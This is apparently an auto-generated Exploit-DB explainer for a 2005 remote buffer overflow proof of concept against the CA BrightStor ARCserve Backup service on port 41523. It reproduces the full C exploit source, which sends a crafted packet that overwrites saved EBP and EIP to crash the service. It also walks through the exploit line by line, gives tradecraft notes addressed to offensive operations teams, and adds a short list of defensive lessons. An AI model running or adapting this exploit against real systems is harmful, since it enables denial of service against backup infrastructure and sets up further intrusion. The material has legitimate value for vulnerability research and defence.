By exploitdb papers bot•February 12, 2005•
papers
CA BrightStor ARCserve Backup - Remote Buffer Overflow Explained
CA BrightStor ARCserve Backup - Remote Buffer Overflow Explained
What this paper is
This paper is a Proof of Concept (PoC) exploit for a remote buffer overflow vulnerability in CA BrightStor ARCserve Backup. It was published in 2005 and targets a specific network service of the backup software. The exploit aims to crash the service by sending a malformed network packet that overwrites critical memory regions, leading to a denial of service (DoS).
Simple technical breakdown
The exploit works by sending a specially crafted network packet to the vulnerable ARCserve Backup service. This packet is much larger than the service expects for a particular command or data structure. When the service tries to process this oversized packet, it writes data beyond the allocated buffer in memory. This overflow corrupts adjacent memory, including crucial control information like the return address. By carefully controlling the overflow, an attacker can overwrite the return address with a value that points to attacker-controlled code (though this specific PoC focuses on crashing the service, not executing arbitrary code).
Complete code and payload walkthrough
The provided code is a C program designed to exploit the vulnerability. Let's break it down:
Header Files and Definitions
#include <stdio.h>: Standard input/output functions.#include <sys/types.h>: System data types.#include <sys/stat.h>: File status information.#include <fcntl.h>: File control options.#include <netinet/in.h>: Internet address family structures.#include <netdb.h>: Network database operations (likegethostbyname).Color Definitions:
RED,GREEN,YELLOW,BLUE,NORMALare ANSI escape codes for colored terminal output, used for visual feedback.#define PORT 41523: Defines the target port the ARCserve Backup service is listening on.
start Function
This function is responsible for constructing and sending the malicious network packet.
void start ( int s ): Takes an integersrepresenting the socket file descriptor.char buffer[4096];: Declares a buffer of 4096 bytes to hold the data to be sent.bzero ( &buffer, 4096 );: Initializes the entire buffer to zeros.memset ( buffer, 0x41, 50 );: Fills the first 50 bytes of the buffer with the ASCII character 'A' (hex0x41). This is a common technique to establish a baseline of data before specific modifications.Specific Byte Overwrites: The following lines meticulously set specific bytes within the
buffer. These bytes are not random; they are carefully chosen to manipulate the network packet's structure and trigger the overflow.buffer[0] = 0x9b;buffer[1] = 0x53; //Sbuffer[2] = 0x45; //Ebuffer[3] = 0x52; //Rbuffer[4] = 0x56; //Vbuffer[5] = 0x49; //Ibuffer[6] = 0x43; //Cbuffer[7] = 0x45; //Ebuffer[8] = 0x50; //Pbuffer[9] = 0x43; //C- Practical Purpose: These bytes likely form a specific command or header for the ARCserve protocol. The sequence "SERVICEPC" (0x53 0x45 0x52 0x56 0x49 0x43 0x45 0x50 0x43) is a strong indicator of a command name or identifier. The initial
0x9bmight be a packet type or length indicator.
- Practical Purpose: These bytes likely form a specific command or header for the ARCserve protocol. The sequence "SERVICEPC" (0x53 0x45 0x52 0x56 0x49 0x43 0x45 0x50 0x43) is a strong indicator of a command name or identifier. The initial
buffer[17] = 0x18;buffer[21] = 0xc0;buffer[22] = 0xa8;buffer[23] = 0x02;buffer[24] = 0x67;buffer[25] = 0x53; //Sbuffer[26] = 0x45; //Ebuffer[27] = 0x52; //Rbuffer[28] = 0x56; //Vbuffer[29] = 0x49; //Ibuffer[30] = 0x43; //Cbuffer[31] = 0x45; //Ebuffer[32] = 0x50; //Pbuffer[33] = 0x43; //C- Practical Purpose: These bytes likely represent fields within the protocol's data structure. The repetition of "SERVICEPC" suggests it might be a parameter or identifier associated with the service. The IP address-like sequence
0xc0 0xa8 0x02 0x67(192.168.2.103) is particularly interesting, suggesting a target IP address is being embedded.
- Practical Purpose: These bytes likely represent fields within the protocol's data structure. The repetition of "SERVICEPC" suggests it might be a parameter or identifier associated with the service. The IP address-like sequence
buffer[41] = 0x01;buffer[43] = 0x0c;buffer[44] = 0x6c;buffer[45] = 0x93;buffer[46] = 0xce;buffer[47] = 0x18;buffer[48] = 0x18;- Practical Purpose: These bytes continue to populate fields within the packet. Their exact meaning depends on the ARCserve protocol's internal structure, but they are part of the data that is being sent in excess.
//ebpbuffer[49] = 0xbe;buffer[50] = 0xba;buffer[51] = 0xad;buffer[52] = 0xde;- Practical Purpose: This sequence (
0xde 0xad 0xbe 0xba) is a common placeholder for the Base Pointer (EBP) register. In a buffer overflow, overwriting EBP can be a step towards controlling the instruction pointer.
- Practical Purpose: This sequence (
//eipbuffer[53] = 0xde;buffer[54] = 0xc0;buffer[55] = 0xad;buffer[56] = 0xde;- Practical Purpose: This sequence (
0xde 0xad 0xc0 0xde) is a placeholder for the Instruction Pointer (EIP) register. Overwriting EIP is the primary goal of many buffer overflow exploits, as it dictates where the CPU will fetch its next instruction. In this PoC, these specific bytes are likely chosen to cause a crash by pointing EIP to invalid memory.
- Practical Purpose: This sequence (
printf ( "[*] Sending buffer [ %d bytes ]...", strlen ( buffer ) );: Prints a message indicating the buffer size being sent.strlen(buffer)will calculate the length up to the first null terminator.if ( write ( s, buffer, strlen ( buffer ) ) <= 0 ): Writes the constructedbufferto the sockets. If the write fails (returns 0 or less), it prints an error and exits.printf ( GREEN "OK!\n" NORMAL );: Indicates a successful write.sleep ( 1 );: Pauses execution for 1 second.
main Function
This is the entry point of the program.
int main ( int argc, char *argv[] ): Takes command-line arguments.argcis the count,argvis the array of arguments.int s;: Declares an integer for the socket file descriptor.struct hostent *he;: A pointer to ahostentstructure, which will store information about the resolved hostname.struct sockaddr_in addr;: A structure to hold the server's address information.if ( argc != 2 ): Checks if exactly one command-line argument (the hostname) was provided. If not, it prints a usage message and exits.- Hostname Resolution:
printf ( "Resolving hostname..." );: Informs the user about the hostname resolution process.if ( ( he = gethostbyname ( argv[1] ) ) == NULL ): Callsgethostbynameto resolve the provided hostname (argv[1]) into an IP address. If resolution fails, it prints an error and exits.printf ( "OK!\n" );: Indicates successful hostname resolution.
- Socket Creation:
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 ): Creates a TCP socket.AF_INETspecifies the IPv4 address family,SOCK_STREAMspecifies a stream socket (TCP), and0indicates the default protocol. If socket creation fails, it exits.
- Address Configuration:
addr.sin_family = AF_INET;: Sets the address family to IPv4.addr.sin_port = htons ( PORT );: Sets the destination port to thePORTdefined earlier (41523), converting it to network byte order usinghtons.addr.sin_addr = *( ( struct in_addr * ) he->h_addr );: Copies the resolved IP address from thehostentstructure into thesockaddr_instructure.
- Connection:
printf ( "Connecting to %s...", argv[1] );: Informs the user about the connection attempt.if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 ): Attempts to connect to the target host and port. If the connection fails, it prints an error and exits.printf ( "OK!\n" );: Indicates a successful connection.
start ( s );: Calls thestartfunction to send the malicious payload.close ( s );: Closes the socket connection.return ( 0 );: Exits the program successfully.
Shellcode/Payload Segment Explanation
This PoC does not contain explicit shellcode bytes for arbitrary code execution. Instead, the "payload" is the crafted buffer itself. The bytes placed at specific offsets (especially buffer[49] through buffer[56]) are designed to overwrite the EBP and EIP registers.
buffer[49]tobuffer[52](0xbe, 0xba, 0xad, 0xde): These bytes are intended to overwrite the saved EBP register. When a function returns, the CPU uses the value on the stack to restore EBP. By overwriting it with a predictable pattern, the attacker can influence the stack state.buffer[53]tobuffer[56](0xde, 0xc0, 0xad, 0xde): These bytes are intended to overwrite the saved EIP register. The EIP register holds the address of the next instruction to be executed. By overwriting it with a specific value (in this case,0xdeadc0de), the attacker forces the program to jump to an address that is likely invalid or points to data, causing a segmentation fault and crashing the application.
Mapping list:
#include <stdio.h>...#define PORT 41523: Standard setup and configuration.void start ( int s ): Function to handle sending the malicious data.char buffer[4096];: The buffer to construct the malicious packet.bzero(&buffer, 4096);: Initialize buffer to zeros.memset(buffer, 0x41, 50);: Fill initial part of buffer with 'A's.buffer[0] = 0x9b; ... buffer[9] = 0x43;: Likely packet header/command identifier.buffer[17] = 0x18; ... buffer[33] = 0x43;: Data fields within the packet, possibly including an IP address.buffer[49] = 0xbe; ... buffer[52] = 0xde;: Overwrite EBP (Base Pointer).buffer[53] = 0xde; ... buffer[56] = 0xde;: Overwrite EIP (Instruction Pointer) with a crash-inducing address.printf("[*] Sending buffer...");: Informative output.write(s, buffer, strlen(buffer));: Send the crafted packet over the network.int main(int argc, char *argv[]): Main program entry point.if (argc != 2): Argument validation.gethostbyname(argv[1]): Resolve target hostname to IP.socket(AF_INET, SOCK_STREAM, 0): Create a TCP socket.addr.sin_family = AF_INET; ... addr.sin_addr = ...: Configure the server address.connect(s, ...): Establish connection to the target service.start(s);: Execute the exploit payload.close(s);: Close the connection.
Practical details for offensive operations teams
- Required Access Level: Network access to the target system is required. The exploit targets a network service, so no local access is initially needed.
- Lab Preconditions:
- A vulnerable CA BrightStor ARCserve Backup instance must be running and accessible on the network.
- The target service must be listening on port 41523.
- A network path must exist between the attacker's machine and the target.
- The target operating system and architecture must be compatible with the exploit's assumptions about memory layout and register usage (likely x86).
- Tooling Assumptions:
- A C compiler (like GCC) to compile the PoC.
- A Linux or Unix-like environment to run the compiled exploit.
- Network connectivity.
- Execution Pitfalls:
- Port Blocking: Firewalls might block traffic to port 41523.
- Service Not Running: The ARCserve Backup service might not be running or might be configured on a different port.
- Patching: The vulnerability might have been patched in newer versions of ARCserve Backup.
- Architecture Mismatch: The exploit is likely written for a specific architecture (e.g., x86). Running it against a different architecture might not work as expected.
- Buffer Size/Offset Calculation: The exact offsets and values used in the buffer might vary slightly between different versions or configurations of the software, leading to a failed overflow or a crash in a different location. The
strlen(buffer)might also be problematic if the intended packet structure relies on a specific byte count rather than null termination. - Network Latency/Reliability: Unreliable network conditions could cause the
writeorconnectoperations to fail.
- Tradecraft Considerations:
- Reconnaissance: Confirm the presence and version of CA BrightStor ARCserve Backup. Identify the listening port.
- Staging: The exploit is a simple client. It requires a target to connect to.
- Payload Delivery: This PoC is the payload. It's executed directly.
- Post-Exploitation: This PoC only causes a Denial of Service. For true compromise, a different payload would be needed, and the EIP overwrite would need to point to shellcode. This would involve significant research into the target's memory layout and the specific ARCserve protocol.
- Telemetry: Network traffic to port 41523 from the attacker's IP. The target service crashing or becoming unresponsive.
Where this was used and when
- Context: This exploit targets CA BrightStor ARCserve Backup, a commercial backup software solution. Vulnerabilities in such enterprise software are often targeted by attackers seeking to disrupt business operations or gain a foothold in a network.
- Approximate Year: Published in February 2005. Exploits from this era often targeted common vulnerabilities like buffer overflows in network services. It's plausible that this vulnerability was exploited in the wild shortly after its discovery and publication, or it could have been used by penetration testers. Specific instances of real-world exploitation are not detailed in the paper itself.
Defensive lessons for modern teams
- Vulnerability Management: Regularly scan for and patch known vulnerabilities in critical infrastructure software, including backup solutions.
- Network Segmentation: Isolate critical services like backup servers from less trusted network segments.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and configure IDS/IPS to detect and block malformed network packets targeting known vulnerable services. Signatures for this specific type of overflow might exist or could be developed.
- Application Hardening: Ensure services are configured securely, with unnecessary features disabled and access restricted.
- Logging and Monitoring: Monitor network traffic for unusual connections to critical services and monitor service health for unexpected crashes.
- Protocol Analysis: Understand the expected structure of network protocols used by critical applications. Anomalies can indicate malicious activity.
- Memory Protection: Modern operating systems and compilers employ various memory protection techniques (like DEP/NX bit, ASLR) that make classic buffer overflows harder to exploit for code execution, though they can still lead to DoS.
ASCII visual (if applicable)
This exploit involves a direct client-server interaction where the client sends a malformed packet. A simple visual representation:
+-----------------+ +---------------------------------+
| Attacker Client | ----> | CA BrightStor ARCserve Backup |
| (Exploit PoC) | | (Vulnerable Service on Port |
+-----------------+ | 41523) |
+---------------------------------+
|
| Malformed Packet
| (Buffer Overflow)
v
+-----------------+
| Memory Corruption |
| (EIP Overwrite) |
+-----------------+
|
v
+-----------------+
| Service Crash |
| (Denial of |
| Service) |
+-----------------+Source references
- Paper ID: 815
- Paper Title: CA BrightStor ARCserve Backup - Remote Buffer Overflow (PoC)
- Author: cybertronic
- Published: 2005-02-12
- Keywords: Linux, dos
- Paper URL: https://www.exploit-db.com/papers/815
- Raw URL: https://www.exploit-db.com/raw/815
Original Exploit-DB Content (Verbatim)
/*
* BrightStor ARCserve Backup buffer overflow PoC
* cybertronic@gmx.net
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 41523
void
start ( int s )
{
char buffer[4096];
bzero ( &buffer, 4096 );
memset ( buffer, 0x41, 50 );
buffer[0] = 0x9b;
buffer[1] = 0x53; //S
buffer[2] = 0x45; //E
buffer[3] = 0x52; //R
buffer[4] = 0x56; //V
buffer[5] = 0x49; //I
buffer[6] = 0x43; //C
buffer[7] = 0x45; //E
buffer[8] = 0x50; //P
buffer[9] = 0x43; //C
buffer[17] = 0x18;
buffer[21] = 0xc0;
buffer[22] = 0xa8;
buffer[23] = 0x02;
buffer[24] = 0x67;
buffer[25] = 0x53; //S
buffer[26] = 0x45; //E
buffer[27] = 0x52; //R
buffer[28] = 0x56; //V
buffer[29] = 0x49; //I
buffer[30] = 0x43; //C
buffer[31] = 0x45; //E
buffer[32] = 0x50; //P
buffer[33] = 0x43; //C
buffer[41] = 0x01;
buffer[43] = 0x0c;
buffer[44] = 0x6c;
buffer[45] = 0x93;
buffer[46] = 0xce;
buffer[47] = 0x18;
buffer[48] = 0x18;
//ebp
buffer[49] = 0xbe;
buffer[50] = 0xba;
buffer[51] = 0xad;
buffer[52] = 0xde;
//eip
buffer[53] = 0xde;
buffer[54] = 0xc0;
buffer[55] = 0xad;
buffer[56] = 0xde;
printf ( "[*] Sending buffer [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "Send failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
sleep ( 1 );
}
int
main ( int argc, char *argv[] )
{
int s;
struct hostent *he;
struct sockaddr_in addr;
if ( argc != 2 )
{
fprintf ( stderr,"Usage: %s hostname\n", argv[0] );
exit ( 1 );
}
printf ( "Resolving hostname..." );
if ( ( he = gethostbyname ( argv[1] ) ) == NULL )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( "OK!\n" );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
exit ( 1 );
}
addr.sin_family = AF_INET;
addr.sin_port = htons ( PORT );
addr.sin_addr = *( ( struct in_addr * ) he->h_addr );
printf ( "Connecting to %s...", argv[1] );
if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( "OK!\n" );
start ( s );
close ( s );
return ( 0 );
}
// milw0rm.com [2005-02-12]